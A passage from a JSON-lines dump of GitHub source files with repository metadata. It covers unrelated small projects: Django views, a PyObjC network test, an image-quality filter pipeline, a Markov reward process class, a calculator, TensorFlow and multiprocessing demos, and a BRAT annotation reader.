saves the tensor as a grid of images by calling ``make_grid``.\n **kwargs: Other arguments are documented in ``make_grid``.\n \"\"\"\n if not original: keepColors = False\n tensor = tensor.cpu()\n size = (tensor.size(1), tensor.size(2))\n toIm = transforms.ToPILImage()\n im = toIm(tensor)\n if keepColors:\n im = list(im.convert('YCbCr').split())\n orIm = list(Image.open(original).resize(size, resample=Image.LANCZOS).convert('YCbCr').split())\n orIm[0] = im[0]\n im = Image.merge('YCbCr', orIm).convert('RGB')\n \n im.save(filename)\n\ndef createDir(dir):\n \"\"\"\n Create directory\n \"\"\"\n try: \n os.makedirs(dir)\n print(f'Created new folder at {dir}')\n except FileExistsError: \n print(f'Using previously created folder {dir}')\n return dir\n\ndef saveGif(dir):\n \"\"\"\n Takes a group of images and saves them in a gif\n \"\"\"\n paths = glob(os.path.join(dir, '*.jpg'))\n paths = paths + glob(os.path.join(dir, '*.jpeg'))\n paths = paths + glob(os.path.join(dir, '*.png'))\n\n ims = []\n name = '.gif'\n for im in paths:\n ims.append(Image.open(im))\n name = ims[0].split('/')[0]+'/'+ims[0].split('/')[-1].split('.')[0]+ name\n ims[0].save(name, save_all=True, append_images=ims[1:], duration=500,loop=1)","repo_name":"alenmora/neural-transfer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71101040364","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic.edit import CreateView\nfrom .models import Departamento, DeptoUser\nfrom apps.Estado.funciones import *\n\n\n\n# Create your views here.\n\n#Vista para mostrar una página correspondiente para un usuario logueado!\n@login_required\ndef home(request):\n\tuser = request.user\n\tctx = {'titulo':'Gestión'}\n\tif user.es_root(): #si es usuario ROOT... no devería ver ésta vista\n\t\treturn redirect('/sgpc/cuentas/') #y lo redireccionamos\n\telif user.is_admin():\n\t\tctx['is_admin'] = True\n\n\t#Se crea la página para la gestión de los pedidos dependiendo el Depto\n\td_u = DeptoUser.objects.filter(usuario=request.user)[0] #obtenemos el usuario y el depto al q pertenece\n\tctx['user_depto'] = d_u\n\tctx['usuario'] = d_u.usuario\n\tctx['depto'] = d_u.depto\n\tif exist_depto_in_state(request.user): #si el depto existe en el modelo 'EstadoDepto'\n\t\tctx['gestionar'] = True\n\t\tctx['pedidos_gestion'] = get_pedidos_in_my_depto(request.user)\n\treturn render(request, 'Deptos/depto.html', ctx)\n\n\n#Vista para crear un nuevo Departamento\nclass NuevoDepto(CreateView):\n\tmodel = Departamento\n\tfields = '__all__'\n\ttemplate_name = 'Deptos/nuevo_depto.html'","repo_name":"cammend/SGPC","sub_path":"apps/Deptos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11371106579","text":"from PyObjCTools.TestSupport import *\n\nfrom SystemConfiguration import *\nfrom Foundation import NSData, NSDate\nimport os\n\nclass TestSCDynamicStoreCopyDHCPInfo (TestCase):\n def testFunctions(self):\n def callback(st, keys, info):\n pass\n\n st = SCDynamicStoreCreate(None, \"pyobjc.test\", callback, None)\n self.assertTrue(isinstance(st, SCDynamicStoreRef))\n\n have_ip = False\n with os.popen(\"ifconfig en0 | grep inet\", \"r\") as fp:\n ip = fp.read()\n if ip.strip():\n have_ip = True\n else:\n with os.popen(\"ifconfig en1 | grep inet\", \"r\") as fp:\n ip = fp.read()\n if ip.strip():\n have_ip = True\n\n info = SCDynamicStoreCopyDHCPInfo(st, None)\n if not have_ip:\n self.assertIs(info, None)\n else:\n self.assertIsInstance(info, CFDictionaryRef)\n\n r = DHCPInfoGetOptionData(info, 1)\n self.assertTrue(r is None or isinstance(r, NSData))\n\n r = DHCPInfoGetLeaseStartTime(info)\n self.assertTrue(r is None or isinstance(r, NSDate))\n\n if os_release() >= (10, 8):\n DHCPInfoGetLeaseExpirationTime\n\n if info:\n r = DHCPInfoGetLeaseExpirationTime(info)\n self.assertTrue(r is None or isinstance(r, NSDate))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"apple-open-source/macos","sub_path":"pyobjc/pyobjc/pyobjc-framework-SystemConfiguration-2.5.1/PyObjCTest/test_SCDynamicStoreCopyDHCPInfo.py","file_name":"test_SCDynamicStoreCopyDHCPInfo.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"19"} +{"seq_id":"24913311620","text":"\"\"\"\nFunctionality for easily running several filters on one or\nseveral images simultaneously.\n\"\"\"\n\nimport json\nimport inspect\nfrom operator import attrgetter\nfrom collections import Iterable\n\n\ndef process(images, filters, ROIs=None, return_predictions=False,\n combine_results=True, sort_filters=True):\n \"\"\"Processes an image or a list of images using the specified\n set of filters. Each filter is applied to each image and the\n results are returned as dict of dicts, where the name of the\n image acts as a key to a bool or a dict of filter results.\n\n :param image_paths: a path to a single image as a string or a\n or a list of image paths\n :type image_paths: str, tuple or list\n :param filters: a list of filter objects to apply to each image\n :type filters: list\n :param ROIs: a single ROI as a 4-tuple (x0, y0, w, h) or a list\n of ROIs (should be of same length as images), None\n if not needed\n :type ROIs: list\n :param return_predictions: return predictions as floats\n in range [0, 1] instead of bools\n :type return_predictions: bool\n :param combine_results: combine the results of the filters\n into a single bool, which is false\n if one or more filters returned a\n positive result, and true otherwise\n :type combine_results: bool\n :param sort_filters: run filters in order of their speed\n :type sort_filters: bool\n :returns: dict -- if combine_results is set to True, each\n value is boolean, otherwise all filter\n results are contained in a dict, where\n the results are bools or floats depending\n on the return_predictions parameter\n \"\"\"\n if sort_filters:\n filters.sort(key=attrgetter('speed'))\n\n # process single image\n if isinstance(images, str) or isinstance(images, unicode):\n return {images: __process_image(images, filters, ROIs,\n return_predictions, combine_results)}\n\n # process list or other iterable of images\n elif isinstance(images, Iterable):\n return __process_images(images, filters, ROIs,\n return_predictions, combine_results)\n\n raise TypeError(\"images needs to be a str, 2-tuple or an iterable\")\n\n\ndef process_request(request_json):\n \"\"\"Process a list of images from a JSON request.\n Example JSON request:\n\n { \"images\": {\n \"ko.jpg\": [ 0, 1, 2, 3 ],\n \"ok.jpg\": null\n },\n \"filters\": {\n \"whole_blur\": { \"threshold\": 0.5}\n },\n \"return_predictions\": false,\n \"combine_results\": true,\n \"sort_filters\": true\n }\n\n :param request_json: the JSON request\n :type request_json: str\n :returns: see the documentation for the process function\n \"\"\"\n import qualipy.filters\n filter_classes = inspect.getmembers(qualipy.filters, inspect.isclass)\n\n try:\n request = json.loads(request_json)\n except:\n raise ValueError(\"Invalid JSON format\")\n\n if 'images' not in request or 'filters' not in request:\n raise ValueError(\"images or filters array not in JSON\")\n\n images, ROIs = __parse_images_and_ROIs(request['images'])\n filters = __collect_filters(request['filters'], filter_classes)\n\n return_predictions = __get_argument(request, 'return_predictions', False)\n combine_results = __get_argument(request, 'combine_results', True)\n sort_filters = __get_argument(request, 'sort_filters', True)\n\n return process(images, filters, ROIs, return_predictions, combine_results,\n sort_filters)\n\n\ndef __process_images(images, filters, ROIs, return_predictions,\n combine_results):\n \"\"\"Process a list of images\"\"\"\n if ROIs is None:\n return {image: __process_image(image, filters, None,\n return_predictions, combine_results)\n for image in images}\n\n if len(images) != len(ROIs):\n raise ValueError(\"image and ROI lists need to be of same length\")\n\n return {image: __process_image(image, filters, roi,\n return_predictions, combine_results)\n for image, roi in zip(images, ROIs)}\n\n\ndef __process_image(image, filters, ROI, return_predictions, combine_results):\n \"\"\"Process a single image by running given list of filters on it.\"\"\"\n args, results = __get_predict_args(image, ROI, return_predictions), {}\n\n for filt in filters:\n prediction = filt.predict(*args)\n\n # if the result should be returned as a single boolean,\n # return False straightaway after getting a positive result\n if not return_predictions and combine_results and prediction:\n return False\n\n results[filt.name] = prediction\n\n if not return_predictions and combine_results:\n return True\n return results\n\n\ndef __get_predict_args(image, ROI, return_predictions):\n \"\"\"Helper function for formatting arguments given to the predict\n function.\"\"\"\n if ROI is not None:\n if type(ROI) != tuple:\n raise TypeError(\"invalid type ROI for image: %s\" % image)\n\n if len(ROI) != 4:\n raise TypeError(\"invalid length ROI for image: %s\" % image)\n\n return image, not return_predictions, ROI\n\n\ndef __get_filter(name, filter_classes):\n for _, filter in filter_classes:\n if filter.name == name:\n return filter\n return None\n\n\ndef __get_argument(request, arg_name, default):\n if arg_name in request:\n return request[arg_name]\n return default\n\n\ndef __parse_images_and_ROIs(request_images):\n images, ROIs = [], []\n for image, ROI in request_images.iteritems():\n if ROI is None or (isinstance(ROI, list) and len(ROI) == 4):\n images.append(image)\n ROIs.append(None if ROI is None else tuple(ROI))\n else:\n raise ValueError(\"invalid ROI for image %s\" % image)\n return images, ROIs\n\n\ndef __collect_filters(request_filters, filter_classes):\n filters = []\n for filter_name, params in request_filters.iteritems():\n filter_obj = __get_filter(filter_name, filter_classes)\n if filter_obj is None:\n raise ValueError\n\n try:\n # instantiate a filter object with the given parameters\n filters.append(filter_obj(**params))\n except TypeError:\n raise ValueError(\"Invalid parameters for filter %s\" % filter_name)\n\n return filters\n","repo_name":"vismantic-ohtuprojekti/qualipy","sub_path":"qualipy/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6576,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"19"} +{"seq_id":"39786706285","text":"#Pohsun Chang\n#830911\n#MSITM6341\n#10/29/2019\n\n# Python Program to Calculate Sum of Even Numbers from 1 to N\n \nn=int(input('Enter the number:'))\nif(n>0):\n sum=0\n x = 0\n for x in range(0,n+1):\n if(x % 2 == 0):\n sum=sum+x\n \nprint(sum)\n","repo_name":"ppaul456/Python","sub_path":"Attendance/sum_even_numbers.py","file_name":"sum_even_numbers.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74412490604","text":"# coding=utf-8\n\n\"\"\"\nLock(互斥锁)\nLock锁的作用是当多个进程需要访问共享资源的时候,避免访问的冲突。加锁保证了多个进程修改同一块数据时,同一时间只能有一个修改,即串行的修改,牺牲了速度但保证了数据安全。Lock包含两种状态——锁定和非锁定,以及两个基本的方法。\n\n构造方法: Lock()\n\n实例方法:\n\nacquire([timeout]): 使线程进入同步阻塞状态,尝试获得锁定。\nrelease(): 释放锁。使用前线程必须已获得锁定,否则将抛出异常。\n\n======================\n\nRLock(可重入的互斥锁(同一个进程可以多次获得它,同时不会造成阻塞)\nRLock(可重入锁)是一个可以被同一个线程请求多次的同步指令。RLock使用了“拥有的线程”和“递归等级”的概念,处于锁定状态时,RLock被某个线程拥有。拥有RLock的线程可以再次调用acquire(),释放锁时需要调用release()相同次数。可以认为RLock包含一个锁定池和一个初始值为0的计数器,每次成功调用 acquire()/release(),计数器将+1/-1,为0时锁处于未锁定状态。\n\n构造方法:RLock()\n\n实例方法:\n\nacquire([timeout]):同Lock\nrelease(): 同Lock\n\n\n\"\"\"\n\n\nfrom multiprocessing import Process, Lock\n\n\ndef l(lock, num):\n lock.acquire()\n print(\"Hello Num: %s\" % (num))\n lock.release()\n\n\nif __name__ == '__main__':\n lock = Lock() #这个一定要定义为全局\n for num in range(20):\n Process(target=l, args=(lock, num)).start()\n","repo_name":"xiang12835/python-learning","sub_path":"process_and_thread/lock_demo.py","file_name":"lock_demo.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38374693098","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport argparse\nimport logging\nfrom functools import partial\nfrom importlib import import_module\n\nimport sjah.SjahCommand as SjahCommand\n\n\nclass SjahTopLevelCommand(SjahCommand.SjahCommand):\n def __init__(self):\n SjahCommand.SjahCommand.__init__(self)\n self.description = \"Slurm Job Array Helper v {}\".format(self.version)\n # these need to match a class provided in this directory\n # e.g. batch -> BatchCommand.BatchCommand\n self.sub_commands = [\"batch\", \"status\", \"run\"]\n\n def run_subcommand(self):\n subcommand_class_name = \"{}Command\".format(self.args.command.capitalize())\n subcommand_module = import_module(\"sjah.{}\".format(subcommand_class_name))\n subcommand_class = getattr(subcommand_module, subcommand_class_name)\n self.subcommand = subcommand_class()\n self.logger.debug(\"running parser for %s\", self.args.command)\n self.subcommand.run_parser(self.rest_of_args)\n\n def add_args(self):\n # top-level args\n log_levels = self._get_log_levels()\n self.parser.add_argument(\n \"--log-level\",\n help=argparse.SUPPRESS,\n choices=log_levels,\n type=partial(self.choice_alias, log_levels),\n )\n self.parser.add_argument(\n \"command\",\n help=\"Sub-command to run.\",\n choices=self.sub_commands,\n type=partial(self.choice_alias, self.sub_commands),\n )\n self.parser.set_defaults(func=self.run_subcommand)\n\n def run_parser(self):\n # create the top-level parser\n self.parser = argparse.ArgumentParser(\n description=self.description,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n add_help=False,\n prog=self.prog,\n )\n self.add_args()\n self.args, self.rest_of_args = self.parser.parse_known_args()\n if self.args.log_level is not None:\n self.logger.setLevel(getattr(logging, self.args.log_level))\n self.logger.debug(\"Setting logging to %s\", self.args.log_level)\n self.logger.debug(\"Got args %s, %s\", self.args, self.rest_of_args)\n self.args.func()\n\n\ndef main():\n sjah_comm = SjahTopLevelCommand()\n sjah_comm.run_parser()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ycrc/sjah","sub_path":"sjah/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24421041537","text":"from typing import Mapping, Set, Sequence, Tuple, TypeVar, List\nfrom MPv2 import MP\nimport numpy as np\n\n#declare the generic State and Action types\nS = TypeVar('S')\nA = TypeVar('A')\n\nSTSff = Mapping[S, Tuple[Mapping[S, float], float]]\nSSTff = Mapping[S, Mapping[S, Tuple[float, float]]]\nSf = Mapping[S, float]\n#declare the transition matrix type\nSSf = Mapping[S, Mapping[S, float]]\n\n\n\ndef SSTff_to_SSf_Sf(\n info: SSTff\n) -> Tuple[ SSf, SSf ] :\n P = {s : {sp : prob for sp, (prob,_) in innerdict.items() } for s, innerdict in info.items() }\n Rssp = {s : {sp : r for sp, (_,r) in innerdict.items() } for s, innerdict in info.items() }\n return (P, Rssp )\n\n\ndef STSff_to_SSf(\n info: STSff\n) -> SSf :\n return {k : P for k, (P, _) in info.items()}\n\ndef STSff_to_Sf(\n info: STSff\n) -> Sf :\n return {k : r for k, (P, r) in info.items()}\n\nclass MRP(MP):\n\n #member variables\n Rss_map : SSf #rewards SSf\n Rs : List[float] #reward vector\n Rss_matrix : np.ndarray #reward matrix\n #inheriteds\n # state_list: List[S] = None #list of states\n # P_map: SSf = None #transition mapping\n # P_matrix: np.ndarray = None #transition matrix\n \n\n def __init__(\n self,\n state_P_R : STSff,\n gamma : float\n ) -> None:\n #initalize the underlying MP\n P_R = SSTff_to_SSf_Sf(state_P_R)\n super().__init__( P_R[0] )\n #initalize the reward vector\n self.Rss_map = P_R[1]\n self.Rss_matrix = self.convert_to_matrix(self.Rss_map)\n self.gamma = gamma\n self.Rs = self.get_Rs()\n \n def get_Rs(\n self\n ) -> List[float]:\n #matrix multiply\n M = np.multiply(self.P_matrix, self.Rss_matrix)\n #sum across s'\n Rs = np.sum(M, axis=1)\n return list(Rs)\n\n\nif __name__ == '__main__':\n #SSTff\n data = {\n 1: {1: (0.3, 9.2), 2: (0.6, 3.4), 3: (0.1, -0.3)},\n 2: {1: (0.4, 0.0), 2: (0.2, 8.9), 3: (0.4, 3.5)},\n 3: {3: (1.0, 0.0)}\n }\n # #STSff\n # data = {\n # 1: ({1: 0.6, 2: 0.3, 3: 0.1}, 7.0),\n # 2: ({1: 0.1, 2: 0.2, 3: 0.7}, 10.0),\n # 3: ({3: 1.0}, 0.0)\n # }\n mrp_obj = MRP(data, 1.0)\n print(\"trans matrix\")\n print(mrp_obj.P_matrix)\n print(\"trans map\")\n print(mrp_obj.P_map)\n print(\"state list\")\n print(mrp_obj.state_list)\n print(\"Rss matrix\")\n print(mrp_obj.Rss_matrix)\n print(\"Rs\")\n print(mrp_obj.Rs)\n\n\n","repo_name":"lwarne/CME241","sub_path":"MRP.py","file_name":"MRP.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13340439272","text":"def main():\n formula = input('What do you want to do? \\n')\n components = formula.split()\n if len(components) == 3:\n operator = components[1]\n first_number = convert_input(components[0])\n second_number = convert_input(components[2]) \n\n if operator == '+':\n result = addition(first_number, second_number)\n elif operator == '-':\n result = subtraction(first_number, second_number)\n elif operator == '*':\n result = multiplication(first_number, second_number)\n elif operator == '/':\n result = division(first_number, second_number)\n elif operator == '%':\n result = modulo(first_number, second_number)\n else:\n print(f'No formula found: {formula}')\n\n print(f'The answer is: {result}')\n else:\n print(f'No formula found: {formula}')\n\n\ndef convert_input(user_num):\n try:\n number = float(user_num)\n return number\n except ValueError:\n print(f\"Couldn\\'t convert {user_num} to a float\")\n\n\ndef addition(a, b):\n a = convert_input(a)\n b = convert_input(b)\n return a + b\n\n\ndef subtraction(a, b):\n a = convert_input(a)\n b = convert_input(b)\n return a - b\n\n\ndef multiplication(a, b):\n a = convert_input(a)\n b = convert_input(b)\n return a * b\n\n\ndef division(a, b):\n a = convert_input(a)\n b = convert_input(b)\n return a / b\n\n\ndef modulo(a, b):\n a = convert_input(a)\n b = convert_input(b)\n return a % b\n\n\nif __name__ == '__main__':\n main()","repo_name":"jbettenh/calculator","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18288793879","text":"########## 선형회귀 -3~5까지 15개구간으로 나누고 코스트값비교하기 ###########\n# import numpy as np\n#\n# X= np.array([1,2,3])\n# Y= np.array([1,2,3])\n#\n# def cost_func(W,X,Y):\n# c=0\n# for i in range(len(X)):\n# c += (W*X[i] - Y[i])**2\n# return c / len(X)\n# for feed_W in np.linspace( -3, 5, num = 15):\n# curr_cost = cost_func(feed_W,X,Y)\n#\n# print(\"{:6.3f}|{:10.5f}\".format(feed_W, curr_cost))\n###########tensorflow로 작성하기 ###############\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEl'] = '2'\n\nimport numpy as np\nimport tensorflow as tf\n\nX= np.array([1,2,3])\nY= np.array([1,2,3,])\n\ndef cost_func(W,X,Y):\n hypothesis = X * W\n return tf.reduce_mean(tf.square(hypothesis - Y))\n\nW_values = np.linspace( -3, 5, num=15)\ncost_values = []\n\nfor feed_W in W_values:\n curr_cost = cost_func(feed_W, X, Y)\n cost_values.append(curr_cost)\n print(\"{:6.3f}|{:10.5f}\".format(feed_W, curr_cost))\n","repo_name":"junhyeonglee1/tensorflow_basic","sub_path":"BasicMLLab3-1.py","file_name":"BasicMLLab3-1.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36242682323","text":"import sys\nfrom Detectors.Preprocessor import Preprocessor\n\nif __name__==\"__main__\":\n from optparse import OptionParser, OptionGroup\n optparser = OptionParser(description=\"A tool chain for making interaction XML, sentence splitting, NER and parsing\")\n optparser.add_option(\"-i\", \"--input\", default=None, dest=\"input\", help=\"The input argument for the first step\")\n optparser.add_option(\"-o\", \"--output\", default=None, dest=\"output\", help=\"The output argument for the last step\")\n #optparser.add_option(\"-p\", \"--parameters\", default=None, dest=\"parameters\", help=\"Step parameters, a comma-separated list of 'STEP.parameter=value' definitions\")\n optparser.add_option(\"-s\", \"--steps\", default=None, dest=\"steps\", help=\"A comma separated list of steps or presets\")\n shortcuts = OptionGroup(optparser, \"Preprocessing step parameter shortcuts\", \"\")\n shortcuts.add_option(\"-n\", \"--dataSetNames\", default=None, dest=\"dataSetNames\", help=\"CONVERT step dataset names\")\n shortcuts.add_option(\"-c\", \"--corpus\", default=None, dest=\"corpus\", help=\"CONVERT step XML corpus element name\")\n shortcuts.add_option(\"--requireEntities\", default=False, action=\"store_true\", dest=\"requireEntities\", help=\"Default setting for parsing steps\")\n #optparser.add_option(\"--constParser\", default=\"BLLIP-BIO\", help=\"BLLIP, BLLIP-BIO or STANFORD\")\n #optparser.add_option(\"--depParser\", default=\"STANFORD-CONVERT\", help=\"STANFORD or STANFORD-CONVERT\")\n shortcuts.add_option(\"--parseName\", default=\"McCC\", help=\"Default setting for parsing steps\")\n shortcuts.add_option(\"--parseDir\", default=None, help=\"IMPORT-PARSE step parse files directory\")\n shortcuts.add_option(\"--importFormats\", default=None, help=\"LOAD/IMPORT-PARSE format options\")\n shortcuts.add_option(\"--exportFormats\", default=None, help=\"EXPORT format options\")\n optparser.add_option_group(shortcuts)\n debug = OptionGroup(optparser, \"Debug and Process Control Options\", \"\")\n# debug.add_option(\"-f\", \"--fromStep\", default=None, dest=\"fromStep\", help=\"Continue from this step\")\n# debug.add_option(\"-t\", \"--toStep\", default=None, dest=\"toStep\", help=\"Stop at after this step\")\n# debug.add_option(\"--omitSteps\", default=None, dest=\"omitSteps\", help=\"Skip these steps\")\n debug.add_option(\"--logPath\", default=\"AUTO\", dest=\"logPath\", help=\"AUTO, None, or a path\")\n #debug.add_option(\"--intermediateFiles\", default=False, action=\"store_true\", dest=\"intermediateFiles\", help=\"Save an intermediate file for each step\")\n debug.add_option(\"--debug\", default=False, action=\"store_true\", dest=\"debug\", help=\"Set debug mode for all steps\")\n optparser.add_option_group(debug)\n (options, args) = optparser.parse_args()\n \n# if options.steps != None:\n# options.steps = [x.strip() for x in options.steps.split(\",\")]\n# if options.omitSteps != None:\n# options.omitSteps = options.omitSteps.split(\",\")\n# \n preprocessor = Preprocessor(options.steps, options.parseName, options.requireEntities)\n if options.steps == None:\n print >> sys.stderr, preprocessor.getHelpString()\n else:\n preprocessor.setArgForAllSteps(\"debug\", options.debug)\n if preprocessor.hasStep(\"CONVERT\"):\n if options.corpus != None:\n preprocessor.getStep(\"CONVERT\").setArg(\"corpusName\", options.corpus)\n if options.dataSetNames != None:\n preprocessor.getStep(\"CONVERT\").setArg(\"dataSetNames\", options.dataSetNames)\n if options.parseDir:\n preprocessor.getStep(\"IMPORT_PARSE\").setArg(\"parseDir\", options.parseDir)\n if options.exportFormats and preprocessor.hasStep(\"EXPORT\"):\n preprocessor.getStep(\"EXPORT\").setArg(\"formats\", options.exportFormats.split(\",\"))\n if options.importFormats:\n if preprocessor.hasStep(\"LOAD\"):\n preprocessor.getStep(\"LOAD\").setArg(\"extensions\", options.importFormats.split(\",\"))\n if preprocessor.hasStep(\"IMPORT_PARSE\"):\n preprocessor.getStep(\"IMPORT_PARSE\").setArg(\"extensions\", options.importFormats.split(\",\"))\n #if options.intermediateFiles:\n # preprocessor.setIntermediateFiles(True)\n preprocessor.process(options.input, options.output, model=None, logPath=options.logPath)","repo_name":"jbjorne/TEES","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"19"} +{"seq_id":"72472201324","text":"import sys\nimport re\nimport os\nfrom pathlib import Path\nfrom config import conf_with_sentence_splitting\n\n# If the .txt files have \\r\\n, have this set to `True`\n_with_crlf = True\n_crlf_rx = re.compile('\\r?\\n$')\n_sentence_case_rx = re.compile('^\\\\s*[A-ZȘȚĂÎÂ][a-zșțăîâ-]+\\\\W')\n\ndef read_txt_ann_pair(txt_file: str, ann_file: str, abbreviations: set[str]) -> dict[str, list[tuple[str, int, int]]]:\n \"\"\"Reads in a pair of a text file and its BRAT annotation counterpart\n and returns the list of paragraphs along with start/end offsets of annotations.\"\"\"\n\n txt_lines = []\n\n with open(txt_file, mode='r', encoding='utf-8') as f:\n txt_lines = f.readlines()\n # end with\n\n ann_offsets = []\n\n with open(ann_file, mode='r', encoding='utf-8') as f:\n line_count = 0\n \n for line in f:\n line_count += 1\n line_parts = line.strip().split('\\t')\n example_added = False\n\n if len(line_parts) == 3:\n tid, offsets, entity = line_parts\n\n if tid and offsets and entity:\n offs_parts = offsets.split()\n\n if len(offs_parts) == 3:\n label, start_off, end_off = offs_parts\n start_off = int(start_off)\n end_off = int(end_off)\n ann_offsets.append((label, start_off, end_off, entity))\n example_added = True\n # end if\n # end if\n # end if\n\n if not example_added:\n print(f'Problem with example @ line [{line_count}] in .ann file [{ann_file}]',\n file=sys.stderr, flush=True)\n # end if\n # end for\n # end with\n\n crt_offset = 0\n eol_offset = 0\n annotations = {}\n\n # For each paragraph line\n for p_line in txt_lines:\n p_line = _crlf_rx.sub('', p_line)\n\n if conf_with_sentence_splitting:\n s_lines = line_sentence_split(abbreviations, p_line)\n else:\n s_lines = [p_line]\n # end if\n\n assert ''.join(s_lines) == p_line\n\n if not s_lines:\n if _with_crlf:\n # Skip over \\r and \\n\n eol_offset += 2\n else:\n # Skip over \\n\n eol_offset += 1\n # end if\n\n crt_offset = eol_offset\n # end if\n\n # For each sentence line\n for i, line in enumerate(s_lines):\n eol_offset = crt_offset + len(line)\n\n if i == len(s_lines) - 1:\n if _with_crlf:\n # Skip over \\r and \\n\n eol_offset += 2\n else:\n # Skip over \\n\n eol_offset += 1\n # end if\n # end if\n\n for lbl, soff, eoff, ent in ann_offsets:\n if soff >= crt_offset and eoff <= eol_offset:\n line_soff = soff - crt_offset\n line_eoff = eoff - crt_offset\n \n assert line[line_soff:line_eoff] == ent\n\n if line not in annotations:\n annotations[line] = []\n # end if\n\n annotations[line].append((lbl, line_soff, line_eoff))\n # end if\n # end for\n\n crt_offset = eol_offset\n # end all sentence lines\n # end for\n\n return annotations\n\ndef line_sentence_split(abbreviations: set[str], input_line: str) -> list[str]:\n \"\"\"All returned strings, concatenated, are equal to the input.\n Split only at '.'\"\"\"\n\n current_sentence = []\n sentences = []\n\n for i in range(len(input_line)):\n current_sentence.append(input_line[i])\n\n if input_line[i] == '.':\n # Check to see if the previous token is \n # not an abbreviation.\n p_token = ['.']\n\n for j in range(i - 1, -1, -1):\n if input_line[j] not in ' \\r\\n\\t':\n p_token.insert(0, input_line[j])\n else:\n break\n # end if\n # end for\n\n p_token = ''.join(p_token)\n\n if p_token not in abbreviations and \\\n i < len(input_line) - 1 and \\\n _sentence_case_rx.match(input_line[i + 1:]):\n sentences.append(''.join(current_sentence))\n current_sentence.clear()\n # end if\n # end if\n # end for\n\n if current_sentence:\n sentences.append(''.join(current_sentence))\n # end if\n\n return sentences\n\n\ndef read_txt_ann_folder(ann_folder: str,\n annotations: dict[str, list[tuple[str, int, int]]],\n abbreviations: set[str]) -> None:\n \"\"\"Reads all BRAT annotations from folder and puts them in `annotations`.\"\"\"\n\n for txt in os.listdir(ann_folder):\n if txt.endswith('.txt'):\n ann = os.path.join(ann_folder, Path(txt).stem + '.ann')\n\n if os.path.isfile(ann):\n txt = os.path.join(ann_folder, txt)\n results = read_txt_ann_pair(\n txt_file=txt,\n ann_file=ann, abbreviations=abbreviations)\n\n for line in results:\n if line not in annotations:\n annotations[line] = results[line]\n else:\n for lb1, so1, eo1 in results[line]:\n conflict_found = False\n\n for lb2, so2, eo2 in annotations[line]:\n if ((so2 <= so1 and so1 <= eo2) or \\\n (so2 <= eo1 and eo1 <= eo2)) and \\\n lb1 != lb2:\n print(f'Conflicting annotation in file [{ann}]:', file=sys.stderr, flush=True)\n print(f' -> {lb1} @ {so1} -- {eo1}', file=sys.stderr, flush=True)\n print(f' -> {lb2} @ {so2} -- {eo2}', file=sys.stderr, flush=True)\n conflict_found = True\n break\n # end if\n # end search for conflic\n\n if not conflict_found and \\\n (lb1, so1, eo1) not in annotations[line]:\n annotations[line].append((lb1, so1, eo1))\n # end if\n # end for\n # end if\n # end for all lines in annotations\n # end if\n # end if\n # end for\n\n\ndef produce_ner_labels(annotations: dict[str, list[tuple[str, int, int]]]) -> list[str]:\n existing_labels = set()\n\n for line in annotations:\n existing_labels = existing_labels.union([lbl for lbl, _, _ in annotations[line]])\n # end for\n\n the_labels = ['O']\n\n for lbl in sorted(existing_labels):\n the_labels.append(f'B-{lbl}')\n the_labels.append(f'I-{lbl}')\n # end for\n\n return the_labels\n","repo_name":"racai-ai/saroj","sub_path":"WebServiceModules/BERTAnnotator/brat.py","file_name":"brat.py","file_ext":"py","file_size_in_byte":7186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18290940495","text":"from flask import Flask\nfrom flask_restx import Api, Resource\n\napp = Flask(__name__)\napi = Api(app) \n\n@api.route('/getmealAmount') \nclass MealAmount(Resource):\n def get(self): \n return {\n \"amount\": 100\n }\n\nif __name__ == '__main__':\n app.run(debug=False, host='0.0.0.0', port=3000)","repo_name":"JaeHyun154/Cabstone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37724498583","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport random\n# Create your views here.\n\ndef cookieSet(request):\n visits = request.session.get('visits', 0) + 1\n request.session['visits'] = visits\n resp = HttpResponse('

    Eat this cookie :)

    view count='+str(visits)+' times

    ' +'

    69b7411e

